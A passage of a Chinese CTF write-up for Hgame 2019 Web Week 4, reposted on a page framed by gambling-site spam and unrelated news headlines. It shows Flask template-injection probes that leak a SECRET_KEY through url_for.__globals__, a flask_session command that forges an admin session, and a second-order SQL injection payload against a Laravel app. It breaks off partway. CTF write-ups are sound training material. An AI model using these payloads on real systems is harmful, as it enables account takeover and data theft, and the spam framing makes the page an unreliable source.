太阳集团2138备用网址

  • 监督曝光——中央纪委国家监委网站 2019-04-26
  • 人民日报现场评论:彰显新时代的开放决心 2019-04-26
  • 日本影片《小偷家族》和《未来的未来》获奥斯卡提名 2019-04-26
  • 《Super TV 2》首位挑战者AOA!“甜蜜厮杀”胜负预告 2019-04-26
  • 党建添马力,基层焕生机 2019-04-26
  • 多家赣新三板企业或将“离场” 2019-04-26
  • 扎克伯格有对手了!21岁的她获评史上最年轻白手起家亿万富翁 2019-04-26
  • 江苏开工建设城市“充电宝” 2019-04-26
  • 中国石油天然气集团有限公司曲广学接受纪律审查和监察调查中国石油天然气集团-要闻 2019-04-26
  • 「天眼网路电视台」 2018两岸媒体联访‧河南全真派圣地〔王屋山〕 2019-04-26
  • 携程第三季度净亏损1.65亿美元 同比转亏 2019-04-26
  • 防弹少年团金泰亨蓝发登各国热搜 玩儿转红粉金黑棕各种发色实力演绎“有颜任性”【组图】 2019-04-25
  • 龙烨为袁竹逍遥画派配画诗欣赏之三 2019-04-25
  • 因应增值税下调 多个豪车品牌在华降价 2019-04-25
  • “小屏论”话两会:“习语”暖人心 2019-04-25
  • 欢迎来到 黑吧太阳集团2138备用网址 是业内专业的游戏平台,为你提供各式各样的精品游戏,最全的游戏项目,同时还为您提供各种游戏专题游戏攻略人气论坛。

    CTF题目实战:2019-Hgame-Web-Week4

    来源:本站整理 作者:佚名 时间:2019-02-24 TAG: 我要投稿

    太阳集团2138备用网址 www.r-island.com 前言
    最近利用空余时间做了一下Hgame,以下是部分web题题解。
    happyPython
    信息搜集
    发现是flask,随手测试一下。
    http://118.25.18.223:3001/{{1+1}}

    发现可能存在SSTI,打了几发payload,发现都是500,想到测试一下过滤。
    http://118.25.18.223:3001/%7B%7B'aa'.upper()%7D%7D

    发现将()替换成了空。

    SECRET_KEY获取
    那么执行命令应该变得非常困难,但是网站有登录,注册功能。
    随手解了一下session。

    猜测可能要伪造user_id=1
    那么不能执行命令,我们可以进行信息读取,获得SECRET_KEY。
    探测了一下过滤,发现url_for还存在。
    http://118.25.18.223:3001/%7B%7Burl_for%7D%7D

    进一步了解一下。
    url_for.__globals__

    发现已经是,继续深入一下,读config。
    url_for.__globals__['current_app'].config
    得到回显
    发现
    'SECRET_KEY': '9RxdzNwq7!nOoK3*'
    session伪造
    我们进行session伪造。
    {u'csrf_token': u'f02a02e70216e476480f9f2be9a07eb76b96f7a5', u'_fresh': True, u'user_id': u'1', u'_id': u'91fa5db15d7b2b86be894999458190d9722d7d7aa0d5236363f921f34c7c17e63c21877fccb83bcb26984e9cac4bd72bc1dcb7750634b0997524cd3d2d9ac3f6'}
    这里直接改user_id不行,本以为有csrf_token,我们需得到下一次csrf_token再伪造。

    此时解密可以得到当前csrf_token。

    进行伪造
    flask_session encode -s '9RxdzNwq7!nOoK3*' -t "{u'csrf_token': u'322ad6ee5c7fb9984464d472c7dadc35e4501756', u'_fresh': True, u'user_id': u'1', u'_id': u'91fa5db15d7b2b86be894999458190d9722d7d7aa0d5236363f921f34c7c17e63c21877fccb83bcb26984e9cac4bd72bc1dcb7750634b0997524cd3d2d9ac3f6'}"
    但是发现仍然不行,这里尝试Python3,发现成功。


    得到flag:hgame{Qu_bu_la1_m1ng_z1_14}。
    happyPHP
    信息搜集
    F12发现源代码有信息泄露。

    下载源码后直接搜索flag。

    发现需要变成id=1的用户才会得到flag。
    二次注入
    同时发现高危操作。
    $name = DB::select("SELECT name FROM `users` WHERE `name`='".Auth::user()->name."'");
    没有经过过滤,直接拼接name。
    容易想到二次注入,这里注册用户。
    1' or 'a'='a
    得到结果

    发现可以注入,思考需要注入的value。
    这里我直接认为注入id=1用户的密码是没有作用的(后来发现就是注密码= =),我们发现这里的密码已加密。
    $user = User::create([
                'name' => $request->name,
                'email' => $request->email,
                'password' => encrypt($request->password),
            ]);
    我们观察到数据库信息
    public function up()
        {
            Schema::create('password_resets', function (Blueprint $table) {

    [1] [2]  下一页

    【声明】:太阳集团2138备用网址(http://www.r-island.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@www.r-island.com,我们会在最短的时间内进行处理。
    • 最新更新
      • 相关阅读
        • 本类热门
          • 最近下载